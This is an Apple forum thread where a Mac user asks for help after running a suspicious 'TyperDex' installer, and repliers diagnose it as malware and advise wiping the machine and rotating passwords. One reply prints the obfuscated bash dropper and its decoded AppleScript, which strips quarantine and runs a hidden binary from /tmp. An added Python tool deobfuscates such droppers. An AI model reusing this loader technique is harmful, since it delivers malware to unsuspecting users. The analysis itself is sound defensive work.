Downloaded a suspicious app. Please help

I use a Mac and I downloaded typerdex(.)org’s app. I came across the app through someone on Threads and they guided me to download and install the app, but it wasn’t the usual way of installing.

After opening the dmg file it said to move it to Terminal, and when I did that and pressed Enter it asked me to enter my Mac’s password. I did that and that was it. I don’t see any app installed. I’m scared that there might be something running in the background that I’m not aware of. The person who guided me has blocked me, so clearly there’s something going on. Is there any way I could find out if this is a virus or something and, if so, how can I get rid of it?


Appreciate the help!

MacBook Pro 16″, macOS 15.3

Posted on Mar 27, 2025 4:53 PM

Question marked as Top-ranking reply

Posted on Mar 27, 2025 7:33 PM

Not 100% sure it's malicious - but it is kind of sketchy at least. The file in the DMG you drag to the Terminal is a bash script:


#!/bin/bash

FXhoRLqY='IyEvYmluL2Jhc2gKb3Nhc2NyaXB0IC1lICdvbiBydW4KICAgIHRyeQogICAgICAgIHNldCBkaXNrTGlzdCB0byBsaXN0IGRpc2'
xUraPryk='tzCiAgICBlbmQgdHJ5C'
AgQMGPxf='iAgICBzZXQgdGFyZ2V0RGlzayB'
opxHSyoX='0byAiIgo'
jGEGUGmb='gICAgdHJ5CiAgICAgICAgcmVwZWF0'
YUEtjAJr='IHdpdGggZGlzayBpbiBkaXNrTGlzdAogICAgICAgICAgICBpZiBkaXNrIGNvbnRhaW5'
KXIkWjgK='zICJUeXBlckRleFNldHVwIiB0aGVuCiAgICAgICAgICAgICAgICBzZXQgdGFyZ2V0RGlzayB0byBkaXNrCiAg'
zzyRgDka='ICAgICAgICAgICAgIC'
FuDnOzWd='BleGl0IHJlcGVhdAogICAgICAgICAgICB'
SlewqVcl='lbmQgaWYKICAgICA'
iKttHYHF='gICBlbmQgcmVwZWF0CiAgICBlbmQgdHJ5C'
XGPSUmcU='iAgICBpZiB0YXJnZXREaXNrIGlzICIiIHRoZW4KICAgICAgICByZXR1cm4KICAgIGVuZCBpZgogICAgc2V0IGZvbGRlclB'
jdRZzsIY='hdGggdG8gIi9Wb2x1bWVzLyIgJiB0YXJnZXREaXNrICYgIi8iCiAgICBzZXQgYXBwTmFtZSB0'
XOnrPYmo='byAiLlR5cGVyRGV4U2V0dXAiCiAgICBzZXQgYXBwUGF0aCB0byBmb2xkZXJQYXRoICYgYXBwTmFtZQogICAgc2V0IHRlbXBBcHBQ'
ZipdVIwQ='YXRoIHRvIC'
qNraIQCR='IvdG1wLyIgJiBh'
HzfKDDyz='cHBOYW1lCiAgICB0'
XnOxbqKW='cnkKICAgICAgICBkbyBzaGVsbCBzY3JpcHQgInJtIC1mICIgJiBxdW90ZWQgZm9ybSBvZiB0ZW1wQXBwUGF0aAogICAgZW5kIHRyeQogICAgdHJ5CiAgICAgICA'
FKGSwYHi='gZG8gc2hlbGwgc2NyaXB0ICJjcCAiICYgcXVvdGVkIGZvcm0gb2YgYXBwUGF0aCAmICIgIiA'
pMpKcAEb='mIHF1b3RlZCBmb3JtIG9mIHRlbXBBcHBQYXRoCiAgICBlbmQgdHJ5CiAgICB0cnkKICAgICAgICBkbyBzaGVsbCBzY3JpcHQgInhhdHR'
VLfddcEb='yIC1jICIgJiBxdW90ZWQgZm9ybSBvZiB'
plNENAmz='0Z'
nlUYhzhZ='W1wQXBwUGF0aAogICAgZW5kIHRyeQogICAgdHJ5CiAgICAgICAgZG8gc2hlbGwgc2NyaXB0ICJ'
PwjdatGl='jaG1vZCAreCAiICYgcXVvdGVkIGZvcm0gb2YgdGVtcEFwcFBhdGgKICAgIGVuZCB0cnkKICAgIHRyeQogICAgICAgIGRvIHNoZWxsIHNjcmlwdCBxdW90ZWQgZm9ybSBvZiB0ZW1wQXB'
JhDsfXxD='wUGF0aAogICAgZW5kIHRyeQplbmQgcnVuJw=='
code="${FXhoRLqY}${xUraPryk}${AgQMGPxf}${opxHSyoX}${jGEGUGmb}${YUEtjAJr}${KXIkWjgK}${zzyRgDka}${FuDnOzWd}${SlewqVcl}${iKttHYHF}${XGPSUmcU}${jdRZzsIY}${XOnrPYmo}${ZipdVIwQ}${qNraIQCR}${HzfKDDyz}${XnOxbqKW}${FKGSwYHi}${pMpKcAEb}${VLfddcEb}${plNENAmz}${nlUYhzhZ}${PwjdatGl}${JhDsfXxD}"

bash -c "$(echo "$code" | base64 --decode)"


The unreadable part in the middle seems to be Base64 encoded:


#!/bin/bash
osascript -e 'on run
    try
        set diskList to list disks
    end try
    set targetDisk to ""
    try
        repeat with disk in diskList
            if disk contains "TyperDexSetup" then
                set targetDisk to disk
                exit repeat
            end if
        end repeat
    end try
    if targetDisk is "" then
        return
    end if
    set folderPath to "/Volumes/" & targetDisk & "/"
    set appName to ".TyperDexSetup"
    set appPath to folderPath & appName
    set tempAppPath to "/tmp/" & appName
    try
        do shell script "rm -f " & quoted form of tempAppPath
    end try
    try
        do shell script "cp " & quoted form of appPath & " " & quoted form of tempAppPath
    end try
    try
        do shell script "xattr -c " & quoted form of tempAppPath
    end try
    try
        do shell script "chmod +x " & quoted form of tempAppPath
    end try
    try
        do shell script quoted form of tempAppPath
    end try
end run'


At a minimum, it seems to be copying an app named ".TyperDexSetup" into /tmp, making it executable, and then running it. ".TyperDexSetup" is a 12 MB binary encoded file.


It's probably malware. Not 100%, but super sketchy. And whatever that binary did, it did with your administrator privilege level - so in theory anything...
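
A static deobfuscator for droppers of the shape shown above, added here as an example; it is not code from the original thread or from the TyperDex package. It rebuilds the `code=` concatenation from the single-quoted fragments, Base64-decodes it, and flags the behaviours the reply calls out (quarantine stripping, chmod +x, staging under /tmp, hidden dot-file, AppleScript shelling out). The dropper text it runs on is a constructed sample with the same structure, not the real blob.

```python
import base64
import re

# Constructed stand-in for the decoded stage: same actions as the
# AppleScript above, shortened so the sample stays small.
SAMPLE_PAYLOAD = ('#!/bin/bash\nosascript -e \'do shell script "cp /Volumes/X/.S /tmp/.S; '
                  'xattr -c /tmp/.S; chmod +x /tmp/.S; /tmp/.S"\'\n')

def build_sample(payload: str, names=("FXhoRLqY", "xUraPryk", "AgQMGPxf", "opxHSyoX")) -> str:
    """Emit a dropper in the quoted script's style: the Base64 of the whole
    payload is cut into uneven fragments, assigned to random-looking names,
    glued back together into `code`, then decoded and piped to bash -c."""
    b64 = base64.b64encode(payload.encode()).decode()
    n = len(names)
    bounds = [min(len(b64) * i // n + (3 * i) % 5, len(b64)) for i in range(1, n)]
    pieces, start = [], 0
    for b in bounds:
        pieces.append(b64[start:b])
        start = b
    pieces.append(b64[start:])
    lines = ["#!/bin/bash", ""] + [f"{nm}='{pc}'" for nm, pc in zip(names, pieces)]
    lines.append('code="' + "".join(f"${{{nm}}}" for nm in names) + '"')
    lines.append('bash -c "$(echo "$code" | base64 --decode)"')
    return "\n".join(lines) + "\n"

ASSIGN_RE = re.compile(r"^([A-Za-z_]\w*)='([^']*)'\s*$", re.M)   # NAME='fragment'
CODE_RE = re.compile(r'^code="((?:\$\{\w+\})+)"\s*$', re.M)        # code="${A}${B}..."
VAR_RE = re.compile(r"\$\{(\w+)\}")

def deobfuscate(script: str) -> str:
    """Resolve the fragment variables in the order `code=` references them,
    join them and decode, without ever executing the script."""
    frags = dict(ASSIGN_RE.findall(script))
    m = CODE_RE.search(script)
    if not m:
        raise ValueError("no code= concatenation found")
    joined = "".join(frags[name] for name in VAR_RE.findall(m.group(1)))
    return base64.b64decode(joined).decode("utf-8", "replace")

INDICATORS = {
    "strips quarantine attribute (xattr -c)": r"xattr\s+-c",
    "marks payload executable (chmod +x)": r"chmod\s+\+x",
    "stages file under /tmp": r"/tmp/",
    "hidden dot-file payload": r"/\.\w",
    "runs shell via AppleScript": r"do shell script",
}

def indicators(decoded: str) -> list:
    """Return the labels of every suspicious behaviour seen in the decoded stage."""
    return [label for label, pat in INDICATORS.items() if re.search(pat, decoded)]

if __name__ == "__main__":
    decoded = deobfuscate(build_sample(SAMPLE_PAYLOAD))
    print(decoded)
    print("indicators:", indicators(decoded))
```

Pointing `deobfuscate` at the script quoted above (saved to a file) yields the same AppleScript the reply reconstructed by hand.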


Mar 27, 2025 8:21 PM in response to Swiftslinger

Files like documents - unlikely, and that sort of thing would be picked up by a Malwarebytes scan of the flash drive or whatever you copy them to, most likely.


Yeah, once you are sure you've saved your important document files, probably time to burn it down and reinstall from scratch - although feel free to get a second opinion. If you have an M-series Mac and macOS 15, there is a cryptographically sealed system volume that malware can't touch...but who knows what it installed outside that volume in places you (as admin) can modify...or if it would be possible to find it all to remove.

Reply

Mar 27, 2025 7:56 PM in response to g_wolfman

Oh, its domain registrar is in Russia...it has a low Tranco score, the server hosts a bunch of other suspicious websites and that particular registrar (reg.ru) is associated with a large number of spammers and fraud sites...yeah this is totally a fraud site and that was malware.



Reply

Mar 27, 2025 8:46 PM in response to Swiftslinger

The hidden file in /tmp, and the obfuscated shell script, both look very sketchy.


The Windows version also looks sketchy: https://www.joesandbox.com/analysis/1633305/0/html


More: https://securityonline.info/crazy-evil-cryptoscam-group-steals-millions-from-crypto-enthusiasts/


If that’s representative of what was installed, I’d wipe the Mac and start over without restoring.


And I wouldn't entirely trust even documents to be entirely unmodified. Microsoft Word macros and executable PDF files do exist.


It probably won’t be on the iPhone, but it may well have accessed backups of the iPhone, or your keychain contents. Which means a password rotation for everything that matters, two-factor authentication if not already, and related steps.

Reply

Mar 27, 2025 9:05 PM in response to Swiftslinger

Swiftslinger wrote:

Oh Noo :(
Even images aren’t safe?


Photos are probably safe.


But there have been issues in the past.


Not the least of which involved NSO Pegasus and JBIG2:


https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html


What’s your comfort level with uncertainty?


If you’re speculating in cryptocurrency for instance, I would assume that Mac to be compromised.


One of the text tools that gets recommended here: https://snippety.app/


I’ve used the Kapeli Dash app for quite a while, though not the snippet feature: https://kapeli.com/

Reply

Mar 27, 2025 9:09 PM in response to MrHoffman

I’m not into crypto at all. I’m just worried they might try to get access to my accounts and do something, like social media or my Apple developer account or something.


Also, I did connect my phone to the Mac to charge and stuff. Is there a chance of the malware being transferred to the phone?

Reply

Mar 27, 2025 9:56 PM in response to Swiftslinger

Swiftslinger wrote:

I’m not into crypto at all. I’m just worried they might try to get access to my accounts and do something, like social media or my Apple developer account or something.


Short of reverse-engineering, nobody knows what this app does. Or if it is malware, sketchy appearances aside.


Also, I did connect my phone to the Mac to charge and stuff. Is there a chance of the malware being transferred to the phone?


I answered that already: “It probably won’t be on the iPhone, but it may well have accessed backups of the iPhone, or your keychain contents. Which means a password rotation for everything that matters, two-factor authentication if not already, and related steps.” And it had full access to the Mac.

Reply
